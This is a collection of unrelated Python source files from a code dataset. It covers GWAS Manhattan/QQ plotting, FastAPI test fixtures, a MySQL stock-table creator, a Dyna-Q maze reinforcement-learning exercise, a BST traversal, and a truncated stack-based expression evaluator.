In[2]:\n\n\nsum_stat = '/f/jianhua/nankai-hic/fine-mapping/prostate_cancer.txt'\nchrom, bp, p = 'CHR','BP','P'\nsep = '\\t'\ndf = pd.read_csv(sum_stat,sep=sep)\n\n\n# # Reduce size\n\n# In[19]:\n\n\ndf['CHR'] = df['CHR'].replace('X',23)\ndf['CHR'] = df['CHR'].astype(int)\ndf['P'] = -np.log10(df['P'])\ndf['P_down'] = df['P'].round(1)\ndf['P'] = df['P'].round(3)\ndf['BP_down'] = df['BP']/5e6\ndf['BP_down'] = df['BP_down'].astype(int)\nidx = np.random.permutation(np.arange(len(df)))\ndf = df.iloc[idx].drop_duplicates(['CHR','P_down','BP_down'])\ndf = df.sort_values(['CHR','BP'])\ndf['P'] = 10 ** -df['P']\n\n\n# In[12]:\n\n\ndef qq(data,ax,color):\n xmax = 0\n ymax = 0\n alpha = 0.9\n color = '#000000'\n n_quantiles = 100\n\n q_pos = np.concatenate([\n np.arange(99.) / len(data),\n np.logspace(-np.log10(len(data)) + 2, 0, n_quantiles)\n ])\n\n q_data = mquantiles(data, prob=q_pos, alphap=0, betap=1, limit=(0, 1))\n q_th = q_pos.copy()\n q_err = np.zeros([len(q_pos), 2])\n for i in range(0, len(q_pos)):\n q_err[i, :] = q_err[i, :] = beta.interval(\n alpha,\n len(data) * q_pos[i],\n len(data) - len(data) * q_pos[i])\n\n q_err[i, q_err[i, :] < 0] = 1e-15\n slope, intercept, r_value, p_value, std_err = linregress(q_th, q_data)\n xmax = np.max([xmax, -np.log10(q_th[1])])\n ymax = np.max([ymax, -np.log10(q_data[0])])\n\n ax.plot(\n -np.log10(q_th[n_quantiles - 1:]),\n -np.log10(q_data[n_quantiles - 1:]),\n '-',\n color=color)\n ax.plot(\n -np.log10(q_th[:n_quantiles]),\n -np.log10(q_data[:n_quantiles]),\n '.',\n color=color,\n label='gf')\n ax.plot([0, xmax], [0, xmax], '--k',color='#f42e30')\n ax.fill_between(\n -np.log10(q_th),\n -np.log10(q_err[:, 0]),\n -np.log10(q_err[:, 1]),\n color=color,\n alpha=0.1,\n )\n\n\n# In[16]:\n\n\ndef manhattan(df,ax):\n df[p] = -np.log10(df[p])\n df = df.sort_values(chrom)\n df_grouped = df.groupby((chrom))\n\n colors = ['#1A1A1A','#999999',]\n x_labels = []\n x_labels_pos = []\n end = 1000\n for num, (name, group) in enumerate(df_grouped):\n group[bp] = group[bp] + end\n end = group[bp].max() + 1000\n ax.scatter(group[bp], group[p],c=colors[num % len(colors)],s=1)\n x_labels.append(name)\n x_labels_pos.append(group[bp].mean())\n ax.axhline(y=-np.log10(5e-8), color='#2222FF', linestyle='-')\n ax.set_xticks(x_labels_pos)\n ax.set_xticklabels(x_labels)\n# print(df.loc[0,bp]-len(df)*0.1,end+len(df)*0.1)\n# ax.set_ylim([-0.5, df[p].max()*1.05])\n\n\n# In[20]:\n\n\n# df = alldf.copy()\nfigure_tile = 'PH-277'\nfig = plt.figure(figsize=(24, 6))\ngs = gridspec.GridSpec(1, 2, width_ratios=[3, 1])\nax0 = plt.subplot(gs[0])\nax1 = plt.subplot(gs[1])\nqq(df[p], ax1, 'b')\nmanhattan(df,ax0)\n# ax0.set_xlim(left=-3e7,right=2.9e9)\nax0.set_xlabel('Chromosome', fontsize=14)\nax0.set_ylabel('-$\\mathregular{log_{10}}$P', fontsize=14)\nax1.set_xlabel('Observed -$\\mathregular{log_{10}}$P', fontsize=14)\nax1.set_ylabel('Expected -$\\mathregular{log_{10}}$P', fontsize=14)\nax0.spines['right'].set_visible(False)\nax0.spines['top'].set_visible(False)\nax1.spines['right'].set_visible(False)\nax1.spines['top'].set_visible(False)\nfig.suptitle(figure_tile, fontsize=20)\nfig.tight_layout()\nfig.savefig('{}_Manhattan_QQ.pdf'.format(figure_tile), dpi=300)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Jianhua-Wang/sci_viz_py","sub_path":"notebook/_build/jupyter_execute/docs/manhattan_qq.py","file_name":"manhattan_qq.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"74208845219","text":"from typing import Generator, Iterator\n\nfrom fastapi.testclient import TestClient\nimport pytest\nfrom sqlalchemy.orm import Session\n\nfrom app import main\nfrom app.database.models import Base, User\nfrom app.routers import (\n agenda, event, friendview, google_connect, invitation, profile\n)\nfrom app.routers.salary import routes as salary\nfrom tests import security_testing_routes\nfrom tests.conftest import get_test_db, test_engine\n\nmain.app.include_router(security_testing_routes.router)\n\n\ndef get_test_placeholder_user() -> User:\n return User(\n username='fake_user',\n email='fake@mail.fake',\n password='123456fake',\n full_name='FakeName',\n language_id=1,\n telegram_id='666666',\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef client() -> TestClient:\n return TestClient(main.app)\n\n\ndef create_test_client(get_db_function) -> Generator[Session, None, None]:\n Base.metadata.create_all(bind=test_engine)\n main.app.dependency_overrides[get_db_function] = get_test_db\n\n with TestClient(main.app) as client:\n yield client\n\n main.app.dependency_overrides = {}\n Base.metadata.drop_all(bind=test_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef agenda_test_client() -> Generator[TestClient, None, None]:\n yield from create_test_client(agenda.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef friendview_test_client() -> Generator[TestClient, None, None]:\n yield from create_test_client(friendview.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef event_test_client() -> Generator[TestClient, None, None]:\n yield from create_test_client(event.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef home_test_client() -> Generator[TestClient, None, None]:\n yield from create_test_client(main.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef invitation_test_client() -> Generator[TestClient, None, None]:\n yield from create_test_client(invitation.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef profile_test_client() -> Generator[Session, None, None]:\n Base.metadata.create_all(bind=test_engine)\n main.app.dependency_overrides[profile.get_db] = get_test_db\n main.app.dependency_overrides[\n profile.get_placeholder_user] = get_test_placeholder_user\n\n with TestClient(main.app) as client:\n yield client\n\n main.app.dependency_overrides = {}\n Base.metadata.drop_all(bind=test_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef security_test_client():\n yield from create_test_client(event.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef salary_test_client() -> Iterator[TestClient]:\n yield from create_test_client(salary.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef google_connect_test_client():\n Base.metadata.create_all(bind=test_engine)\n main.app.dependency_overrides[google_connect.get_db] = get_test_db\n\n with TestClient(main.app) as client:\n yield client\n\n main.app.dependency_overrides = {}\n Base.metadata.drop_all(bind=test_engine)\n","repo_name":"PythonFreeCourse/calendar","sub_path":"tests/client_fixture.py","file_name":"client_fixture.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"35"} +{"seq_id":"12619541274","text":"# @author Duke Chain\n# @File:CreateStockInfo.py\n# @createTime 2020/11/05 22:54:05\n\nimport pymysql\n\n\nclass CreateStockInfo:\n \"\"\"\n 为新收集的数据在stock_info数据库中创建表\n 表命名规则:stockID\n\n Args:\n stockID:传入股票ID\n database:目标位于的数据库(daily,weekly,monthly)\n content:判断数据库类型(d(日),t(秒),m(分钟))\n \"\"\"\n\n def __init__(self, stockID, database, content='m'):\n self.stockID = stockID\n self.database = database\n self.content = content\n\n def _connection(self):\n \"\"\"\n 建立和数据库的连接\n \"\"\"\n conn = pymysql.connect(\"localhost\", \"root\", \"qian258046\", self.database, charset='utf8')\n cursor = conn.cursor()\n return cursor, conn\n\n def createTable(self):\n \"\"\"\n 为stockID创建表\n ts_code trade_date open high low close pre_close chg pct_chg vol amount\n\n Returns:\n 建表成功返回Ture,失败返回False\n \"\"\"\n cursor, conn = self._connection()\n existence = cursor.execute(\"show tables like '%s';\" % self.stockID)\n # 检查该表是否已经存在\n if existence == 1:\n print('该表已存在,不予重复创建')\n return False\n else:\n # 日���数据表\n if self.content == 'd':\n sql = \"\"\"CREATE TABLE `{}`(\n trade_date char(30),\n close_price float,\n high_price float,\n low_price float,\n open_price float,\n pre_close float,\n volume float,\n outstanding_share float,\n turnover float\n )\"\"\".format(self.stockID)\n # 秒级数据表\n elif self.content == 't':\n sql = \"\"\"CREATE TABLE `{}`(\n trade_date char(30),\n stock_price float,\n chg float,\n volume float\n )\"\"\".format(self.stockID)\n # 分钟级数据表\n else:\n sql = \"\"\"CREATE TABLE `{}`(\n trade_date char(30),\n open_price float,\n high_price float,\n low_price float,\n close_price float,\n volume float\n )\"\"\".format(self.stockID)\n cursor.execute(sql)\n print(self.stockID + \"信息表已创建!\")\n conn.commit()\n conn.close()\n\n return True\n\n# 测试信息\n# test = CreateStockInfo('test_table')\n# test.createTable()\n","repo_name":"dukechain2333/BossaNova","sub_path":"DBOperate/CreateStockInfo.py","file_name":"CreateStockInfo.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"29104988390","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport matplotlib.dates as mdates\n\n\n#1/1/07 till now monthly (per gram?)\n\ngold = pd.read_csv(\"Gold.csv\")\nbrent = pd.read_csv(\"brent-month_csv.csv\")\ndollar = pd.read_csv(\"USDX.csv\")\ndates = mdates.num2date(mdates.datestr2num(gold['date']))\nGold = gold['price']\nBrent = brent['Brent Spot Price']\nDollar = dollar['Price']\n\nfig, ax1 = plt.subplots()\nax1.plot(dates, Gold, 'y')\nax1.set_ylabel('Gold (yellow)')\nax2 = ax1.twinx()\nax2.plot(dates, Brent, 'k')\nax2.set_ylabel('Brent (Black)')\nfig.autofmt_xdate()\nplt.grid(True)\n\nfig, ax1 = plt.subplots()\nax1.plot(dates, Dollar, 'r')\nax1.set_ylabel('Dollar (red)')\nax2 = ax1.twinx()\nax2.plot(dates, Brent, 'k')\nax2.set_ylabel('Brent (Black)')\nfig.autofmt_xdate()\nplt.grid(True)\n\nfig, ax1 = plt.subplots()\nax1.plot(dates, Dollar, 'r')\nax1.set_ylabel('Dollar (red)')\nax2 = ax1.twinx()\nax2.plot(dates, Gold, 'y')\nax2.set_ylabel('Gold (yellow)')\nfig.autofmt_xdate()\nplt.grid(True)\n\nGoldBrent07_12 = np.corrcoef(Gold[0:84],Brent[0:84]) #From 07 to 12\nGoldBrent15_18 = np.corrcoef(Gold[96:],Brent[96:]) #From 15 to 18\n\nprint('GoldBrent07_12', GoldBrent07_12[0][1])\nprint('GoldBrent15_18', GoldBrent15_18[0][1])\nprint('overall GoldBrent', np.corrcoef(Gold,Brent)[0][1])\n\nDollarBrent09_15 = np.corrcoef(Dollar[43:115],Brent[24:96])\nDollarBrent15_18 = np.corrcoef(Dollar[0:43],Brent[96:-1]) \n# Dollar has one month less than Brent (dimension error) so use -1\nprint('DollarBrent09_15', DollarBrent09_15[0][1])\nprint('DollarBrent15_18', DollarBrent15_18[0][1])\nprint('overall GoldBrent', np.corrcoef(Dollar,Brent)[0][1])","repo_name":"shervinrad100/Python-Projects","sub_path":"Hobby/Gold, Dollar, Oil/oilvGold.py","file_name":"oilvGold.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"25359348993","text":"import os\n\nimport pytest\n\nfrom stringify.stringify import stringify\n\n# Вернуть полный путь к файлу в директории fixtures\ndef get_fixture_path(file_name):\n current_dir = os.path.dirname(os.path.abspath(__file__))\n return os.path.join(current_dir, 'fixtures', file_name)\n\n# Прочитать файл по указанному пути\ndef read(file_path):\n with open(file_path, 'r') as f:\n result = f.read()\n return result\n\n# Создаем несколько тестовых значений примитивных типов \n# данных для проверки функции stringify()\nprimitives = {\n \"string\": \"value\",\n \"boolean\": True,\n \"number\": 5,\n}\n\n# Создаем сложную вложенную структуру данных \n# для проверки функции stringify()\nnested = {\n \"string\": \"value\",\n \"boolean\": True,\n \"number\": 5,\n \"dict\": {\n 5: \"number\",\n None: \"None\",\n True: \"boolean\",\n \"value\": \"string\",\n \"nested\": {\n \"boolean\": True,\n \"string\": 'value',\n \"number\": 5,\n None: \"None\",\n },\n },\n}\n\n# Создаем список тестовых случаев для проверки функции stringify()\n# Каждый случай содержит три параметра: заменитель (replacer), \n# количество пробелов (spases_count) и индекс \n# соответствующей строки в файлах plain.txt и nested.txt\ncases = [\n ('|-', 1, 0), # первый уровень вложенности, 1 пробел\n ('|-', 2, 1), # второй уровень вложенности, 2 пробела\n (' ', 3, 2), # третий уровень вложенности, 3 пробела\n]\n\n# Тест функции stringify() на примитивных типах данных\n# Проверяем, что функция правильно преобразует строку, \n# логическое значение и число в строку\n@pytest.mark.parametrize(\"value\", primitives.values())\ndef test_primitives(value):\n \n assert stringify(value) == str(value)\n\nplain_data = read(get_fixture_path('plain.txt')).rstrip().split('\\n\\n\\n')\nnested_data = read(get_fixture_path('nested.txt')).rstrip().split('\\n\\n\\n')\n\n# Тест функции stringify() на сложной вложенной структуре данных\n# Проверяем, что функция правильно преобразует словарь с вложенными словарями и списками в строку с заданным \n# количеством пробелов и заменителями\n@pytest.mark.parametrize(\"replacer,spases_count,case_index\", cases)\ndef test_nested(replacer, spases_count, case_index):\n expected = nested_data[case_index]\n assert stringify(nested, replacer, spases_count) == expected\n\n# Тест функции stringify() на примитивных типах данных\n# Проверяем, что функция правильно преобразует словарь с примитивными типами данных в строку с заданным \n# количеством пробелов и заменителями\n@pytest.mark.parametrize(\"replacer,spases_count,case_index\", cases)\ndef test_plain(replacer, spases_count, case_index):\n expected = plain_data[case_index]\n assert stringify(primitives, replacer, spases_count) == expected\n\n\ndef test_default_values():\n assert stringify(primitives) == plain_data[3]\n assert stringify(primitives, ' ') == plain_data[3]\n assert stringify(primitives, '...') == plain_data[4]\n assert stringify(nested) == nested_data[3]\n assert stringify(nested, ' ') == nested_data[3]\n assert stringify(nested, '...') == nested_data[4]\n","repo_name":"AlexanderLarriva/Stringify","sub_path":"tests/test_stringify.py","file_name":"test_stringify.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28919418648","text":"#Mateo Guaman Castro\n#Homework 3\n#Tufts University\n#Comp 150: Reinforcement Learning\n#Exercise 8.4: Dyna-Q+\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\nclass Environment:\n def __init__(self):\n self.maze = self.generate_maze()\n def generate_maze(self):\n maze = np.array([[1, 1, 1, 1, 1, 1, 1, 1, 100],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 0, 0, 0, 0, 0, 0 ,0, 0],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 500, 1, 1, 1, 1, 1]])\n return maze\n\n\nclass Agent:\n def __init__(self, maze, epsilon, gamma, alpha, kappa, n):\n #Initialize maze\n self.maze = maze\n print(\"Initial maze\")\n #Initialize action space A\n self.act = [-1, 0, 1]\n self.A = [(1,0), (-1, 0), (0, 1), (0, -1)]\n #Initialize state space S\n self.row_pos = [i for i in range(self.maze.shape[0])]\n self.col_pos = [i for i in range(self.maze.shape[1])]\n\n self.S = list(((x,y) for x in self.row_pos for y in self.col_pos))\n\n #Array to keep track of previously selected states and actions\n self.previously_selected = np.zeros((len(self.S), len(self.A)))\n self.Q, self.Model = self.initialize_Q_Model(self.S, self.A)\n self.lastVisited = np.zeros((len(self.S), len(self.A)))\n self.epsilon = epsilon\n self.gamma = gamma\n self.alpha = alpha\n self.kappa = kappa\n self.n = n\n\n def initialize_Q_Model(self, state_space, action_space):\n '''\n Initializes Q(s, a) anc C(s, a) where s in Z^4 and a in Z^2\n Input:\n State space as list of (row_pos, col_pos, row_vel, col_vel)\n Action space as list of (row_delta, col_delta)\n Returns:\n Dictionary Q with key ((row_pos, col_pos, row_vel, col_vel), (row_delta, col_delta)) and value radnom number from normal distribution\n Dictionary Model with key ((row_pos, col_pos, row_vel, col_vel), (row_delta, col_delta)) and value [0,0] where the elements are [Reward, New_state]\n '''\n state_action_tuples = tuple((x, y) for x in state_space for y in action_space)\n Q = {l:np.random.normal(0,1) for l in state_action_tuples}\n Model = {l:[0, 0] for l in state_action_tuples}\n return Q, Model\n\n\n def argmax(self, state):\n '''\n Finds the argmax_a and max_a for a given state. Used for Dyna-Q and Dyna-Q+ with bonus on the reward\n Input:\n State as a tuple (row_pos, col_pos, row_vel, col_vel)\n Returns:\n arg: Index of what action in self.A has the highest value\n highest_Q: Q_value for action with highest value\n '''\n highest_Q = self.Q[state, self.A[0]]\n arg = 0\n for i in range(1, len(self.A)):\n if self.Q[state, self.A[i]] > highest_Q:\n highest_Q = self.Q[state, self.A[i]]\n arg = i\n return arg, highest_Q\n\n def argmax_bonus(self, state):\n '''\n Finds the argmax_a and max_a for a given state. Used Dyna-Q+ with bonus on the action value\n Input:\n State as a tuple (row_pos, col_pos, row_vel, col_vel)\n Returns:\n arg: Index of what action in self.A has the highest value + bonus\n highest_Q: Q_value for action with highest value\n '''\n highest_Q = self.Q[state, self.A[0]] + self.kappa * math.sqrt(self.lastVisited[self.S.index(state), 0])\n arg = 0\n for i in range(1, len(self.A)):\n if self.Q[state, self.A[i]] + self.kappa * math.sqrt(self.lastVisited[self.S.index(state), i]) > highest_Q:\n highest_Q = self.Q[state, self.A[i]]\n arg = i\n return arg, highest_Q\n\n def epsilon_greedy(self, state):\n '''\n Selects an action based on the epsilon-greedy method\n Input:\n State as a tuple (row_pos, col_pos, row_vel, col_vel)\n Returns:\n\n '''\n rand_val = np.random.random()\n if rand_val >= self.epsilon:\n action, _ = self.argmax(state)\n else:\n action = np.random.randint(0,len(self.A))\n return action\n\n def epsilon_greedy_bonus(self, state):\n '''\n Selects an action based on the epsilon-greedy method\n Input:\n State as a tuple (row_pos, col_pos, row_vel, col_vel)\n Returns:\n\n '''\n rand_val = np.random.random()\n if rand_val >= self.epsilon:\n action, _ = self.argmax_bonus(state)\n else:\n action = np.random.randint(0,len(self.A))\n return action\n\n def Q_step(self, state, action, reward, new_state):\n act = self.A[action]\n _, max_a_new_state = self.argmax(new_state)\n self.Q[state, act] += self.alpha * (reward + self.gamma * max_a_new_state - self.Q[state, act])\n return\n\n def update_model(self, state, action, reward, new_state):\n act = self.A[action]\n self.previously_selected[self.S.index(state), self.A.index(act)] = 1\n self.Model[state, act][0] = reward\n self.Model[state, act][1] = new_state\n return\n\n def planning_DynaQ(self):\n for _ in range(0,self.n):\n prev_state = self.random_observed_state()\n prev_action = self.random_prev_action(prev_state)\n state = self.S[prev_state]\n action = self.A[prev_action]\n model_sa = self.Model[state, action]\n reward = model_sa[0]\n new_state = model_sa[1]\n self.Q_step(state, prev_action, reward, new_state)\n return\n\n def planning_DynaQPlus_reward(self):\n for _ in range(0, self.n):\n prev_state = self.random_observed_state()\n prev_action = self.random_prev_action(prev_state)\n state = self.S[prev_state]\n action = self.A[prev_action]\n model_sa = self.Model[state, action]\n reward = model_sa[0] + self.kappa * math.sqrt(self.lastVisited[prev_state, prev_action])\n new_state = model_sa[1]\n self.Q_step(state, prev_action, reward, new_state)\n return\n\n def planning_DynaQPlus_action(self):\n for i in range(0, self.n):\n prev_state = self.random_observed_state()\n prev_action = self.random_prev_action(prev_state)\n state = self.S[prev_state]\n action = self.A[prev_action]\n if (self.previously_selected[prev_state, prev_action] == 1):\n model_sa = self.Model[state, action]\n reward = model_sa[0]\n new_state = model_sa[1]\n else:\n reward = 0\n new_state = state\n self.Q_step(state, prev_action, reward, new_state)\n return\n\n\n def random_observed_state(self):\n indeces = np.where(self.previously_selected == 1)[0]\n return np.random.choice(indeces)\n\n def random_prev_action(self, state_index):\n indeces = np.where(self.previously_selected[state_index, :] == 1)[0]\n return np.random.choice(indeces)\n\n def update_last_visited(self, state, action):\n act = self.A[action]\n self.lastVisited += 1\n self.lastVisited[self.S.index(state), self.A.index(act)] = 0\n return\n\n\n\n\ndef main():\n steps_per_n_avg = np.ndarray((10,10))\n epsilon = 0.3\n gamma = 0.95\n alpha = 0.7\n kappa = 0.01\n n = 10\n num_steps = 100000\n num_iterations_to_avg = 10\n\n avg_DynaQ = np.zeros((num_iterations_to_avg, num_steps))\n avg_DynaQPlus_reward = np.zeros((num_iterations_to_avg, num_steps))\n avg_DynaQPlus_action = np.zeros((num_iterations_to_avg, num_steps))\n\n for k in range(0, num_iterations_to_avg):\n cum_reward = []\n env = Environment()\n agent = Agent(env.maze, epsilon, gamma, alpha, kappa, n)\n episode_info, cum_reward = generate_episode_DynaQ(env, agent, num_steps)\n avg_DynaQ[k, :] = cum_reward\n\n\n cum_reward = []\n env = Environment()\n agent = Agent(env.maze, epsilon, gamma, alpha, kappa, n)\n episode_info, cum_reward = generate_episode_DynaQPlus_action(env, agent, num_steps)\n avg_DynaQPlus_action[k, :] = cum_reward\n\n\n\n cum_reward = []\n env = Environment()\n agent = Agent(env.maze, epsilon, gamma, alpha, kappa, n)\n episode_info, cum_reward = generate_episode_DynaQPlus_reward(env, agent, num_steps)\n avg_DynaQPlus_reward[k, :] = cum_reward\n\n avg_DynaQ = np.mean(avg_DynaQ, axis = 0)\n DynaQ_plot, = plt.plot(np.arange(num_steps), avg_DynaQ, 'r', label='Dyna-Q Learning (n = 4)')\n avg_DynaQPlus_action = np.mean(avg_DynaQPlus_action, axis = 0)\n DynaQAction_plot, = plt.plot(np.arange(num_steps), avg_DynaQPlus_action, 'g', label='Dyna-Q+ Learning, bonus on action (n = 4)')\n avg_DynaQPlus_reward = np.mean(avg_DynaQPlus_reward, axis = 0)\n DynaQReward_plot, = plt.plot(np.arange(num_steps), avg_DynaQPlus_reward, 'b', label='Dyna-Q+ Learning, bonus on reward (n = 4)')\n\n plt.title(\"Cumulative reward vs Number of steps\")\n plt.ylabel(\"Cumulative reward\")\n plt.xlabel(\"Number of steps\")\n plt.legend(handles=[Q_plot, DynaQ_plot])\n plt.savefig('cumReward.png', dpi=300, bbox_inches='tight')\n\n plt.close()\n plot_on_track(env, episode_info)\n plt.imshow(env.maze * 5, cmap='hot', interpolation='nearest')\n plt.title(str(\"Number of steps: \" + str(episode_info.shape[0])))\n plt.savefig('figure.png', dpi=300, bbox_inches='tight')\n\n\ndef generate_episode_DynaQ(env, agent, num_steps):\n cumReward = []\n trajectory = np.empty((0, 4))\n done = False\n state = starting_state(env)\n for i in range(0, num_steps):\n if i == 2000:\n change_maze(env, agent)\n action = agent.epsilon_greedy(state)\n new_state, crossed_boundary, crossed_finish, reward = state_transition(env, agent, state, action)\n agent.Q_step(state, action, reward, new_state)\n agent.update_model(state, action, reward, new_state)\n agent.update_last_visited(state, action)\n agent.planning_DynaQ()\n current = np.array([state, action, reward, new_state], ndmin = 2)\n trajectory = np.append(trajectory, current, axis = 0)\n cumReward = update_cum_reward(cumReward, reward)\n state = new_state\n done = crossed_finish\n if (done):\n state = starting_state(env)\n return trajectory, cumReward\n\ndef generate_episode_DynaQPlus_reward(env, agent, num_steps):\n cumReward = []\n trajectory = np.empty((0, 4))\n done = False\n state = starting_state(env)\n for i in range(0, num_steps):\n if i == 2000:\n change_maze(env, agent)\n action = agent.epsilon_greedy(state)\n new_state, crossed_boundary, crossed_finish, reward = state_transition(env, agent, state, action)\n agent.Q_step(state, action, reward, new_state)\n agent.update_model(state, action, reward, new_state)\n agent.update_last_visited(state, action)\n agent.planning_DynaQPlus_reward()\n current = np.array([state, action, reward, new_state], ndmin = 2)\n trajectory = np.append(trajectory, current, axis = 0)\n cumReward = update_cum_reward(cumReward, reward)\n state = new_state\n done = crossed_finish\n if (done):\n state = starting_state(env)\n return trajectory, cumReward\n\ndef generate_episode_DynaQPlus_action(env, agent, num_steps):\n cumReward = []\n trajectory = np.empty((0, 4))\n done = False\n state = starting_state(env)\n for i in range(0, num_steps):\n if i == 2000:\n change_maze(env, agent)\n action = agent.epsilon_greedy_bonus(state)\n new_state, crossed_boundary, crossed_finish, reward = state_transition(env, agent, state, action)\n agent.Q_step(state, action, reward, new_state)\n agent.update_model(state, action, reward, new_state)\n agent.update_last_visited(state, action)\n agent.planning_DynaQPlus_action()\n current = np.array([state, action, reward, new_state], ndmin = 2)\n trajectory = np.append(trajectory, current, axis = 0)\n cumReward = update_cum_reward(cumReward, reward)\n state = new_state\n done = crossed_finish\n if (done):\n state = starting_state(env)\n return trajectory, cumReward\n\ndef starting_state(env):\n possible_starts = np.where(env.maze[-1,:] == 500)[0]\n i = np.random.randint(0,len(possible_starts))\n state = (env.maze.shape[0]-1, possible_starts[i])\n return state\n\n\ndef state_transition(env, agent, state, action):\n act = agent.A[action]\n crossed_boundary = False\n crossed_finish = False\n reward = 0\n temp_state = list(state)\n\n temp_state[0] += act[0]\n temp_state[1] += act[1]\n\n if (not in_track(env, temp_state)):\n crossed_boundary = True\n return state, crossed_boundary, crossed_finish, reward\n if in_finish_line(env, temp_state):\n reward = 1\n crossed_finish = True\n return tuple(temp_state), crossed_boundary, crossed_finish, reward\n return tuple(temp_state), crossed_boundary, crossed_finish, reward\n\ndef in_track(env, state):\n return in_bounds(env, state) and (env.maze[state[0], state[1]] != 0)\n\ndef in_bounds(env, state):\n return (state[0] >= 0 and state[0] < env.maze.shape[0]) and (state[1] >= 0 and state[1] < env.maze.shape[1])\n\ndef in_finish_line(env, state):\n return env.maze[state[0], state[1]] == 100\n\ndef plot_on_track(env, trajectories):\n for i in range(0, trajectories.shape[0]):\n state = trajectories[i, 0]\n env.maze[state[0], state[1]] += 5\n\ndef update_cum_reward(reward_list, current_reward):\n number_rewards = len(reward_list)\n if number_rewards == 0:\n reward_list.append(current_reward)\n else:\n last_reward = reward_list[number_rewards - 1]\n reward_list.append(last_reward + current_reward)\n return reward_list\n\ndef change_maze(env, agent):\n env.maze = np.array([[1, 1, 1, 1, 1, 1, 1, 1, 100],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 0, 0, 0, 0, 0, 0 ,0, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 500, 1, 1, 1, 1, 1]])\n agent.maze = env.maze\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mateoguaman/Reinforcement-Learning","sub_path":"HW3/maze2.py","file_name":"maze2.py","file_ext":"py","file_size_in_byte":14490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29380979611","text":"import sys\nfrom collections import deque\nfrom heapq import heappush, heappop\nsys.setrecursionlimit(10**9)\nsys.stdin = open('../input.txt')\n\ndef post(start, end):\n if start > end:\n return\n mid = end + 1\n for i in range(start+1, end+1):\n if Num[i] > Num[start]:\n mid = i\n break\n\n post(start+1, mid-1)\n post(mid, end)\n print(Num[start])\n\nif __name__==\"__main__\":\n Num = list()\n while True:\n try:\n N = int(input())\n Num.append(N)\n except:\n break\n\n post(0, len(Num)-1)","repo_name":"Taesun0727/Algorithms","sub_path":"Python/BaekJoon/5639/sun.py","file_name":"sun.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23312466124","text":"from pila import Pila\r\n\r\nfrom functools import reduce\r\n\r\ndiccionario=['*','/','+','-','=']\r\nvariables = {}\r\nerror=[]\r\n\r\ndef esOperador(diccionario,ch):\r\n if(len([x for x in diccionario if x==ch])>0):\r\n return True\r\n else:\r\n return False\r\n\r\ndef verDiccionario(diccionario,ch):\r\n if(esOperador(diccionario,ch)):\r\n return True\r\n elif (ch.isdigit()):\r\n return True\r\n elif (ch.isalpha()):\r\n return True\r\n else:\r\n return False\r\n\r\ndef estaAsignada(variable):\r\n if (variable in variables):\r\n return True\r\n else:\r\n return False\r\n\r\ndef analisis(lista):\r\n for x in lista:\r\n for ch in x:\r\n if(not verDiccionario(diccionario,ch)):\r\n error.append(\"Error caracter no válido \"+ch)\r\n if (not(len(error)>0)):\r\n pila= Pila()\r\n for x in lista:\r\n if(not(len(error)>0)):\r\n analisisSintactico(x)\r\n for ch in x:\r\n if(not(len(error)>0)):\r\n pila.apilar(ch)\r\n if(ch==\"=\"):\r\n pila.desapilar()\r\n elif((ch.isalpha)and (not(ch.isdigit())) and (not(esOperador(diccionario,ch)))):\r\n if(ch==x[len(x)-2]):\r\n pila.desapilar()\r\n if(len(pila.items)>1):\r\n error.append(\"Error no hay operador\")\r\n else:\r\n variables[ch]=pila.desapilar()\r\n else:\r\n if(estaAsignada(ch)):\r\n pila.desapilar()\r\n pila.apilar(variables[ch])\r\n else:\r\n error.append(\"Error variable inexistente \"+ch)\r\n elif((len(pila.items)>2)and(esOperador(diccionario,ch))):\r\n signo = pila.desapilar()\r\n num2 = pila.desapilar()\r\n num1 = pila.desapilar()\r\n pila.apilar(resolver(num1,num2,signo))\r\n else:\r\n print(error)\r\n else:\r\n print(error)\r\n print(variables)\r\n else: \r\n print(error)\r\n\r\ndef evaluar(num1,num2,signo):\r\n if signo=='+':\r\n return str(int(num1) + int(num2))\r\n elif signo=='-':\r\n return str(int(num1) - int(num2))\r\n elif signo=='*':\r\n return str(int(num1) * int(num2))\r\n elif signo=='/':\r\n return str(int((int(num1) / int(num2))))\r\n else:\r\n return 0\r\n \r\n \r\n\r\ndef resolver(num1,num2,signo):\r\n if(num1.isdigit())and(num2.isdigit())and(esOperador(diccionario,signo)):\r\n return evaluar(num1,num2,signo)\r\n else:\r\n error.append(\"Error sintaxis invalida \"+num2+\" \"+signo+\" \"+num1)\r\n return 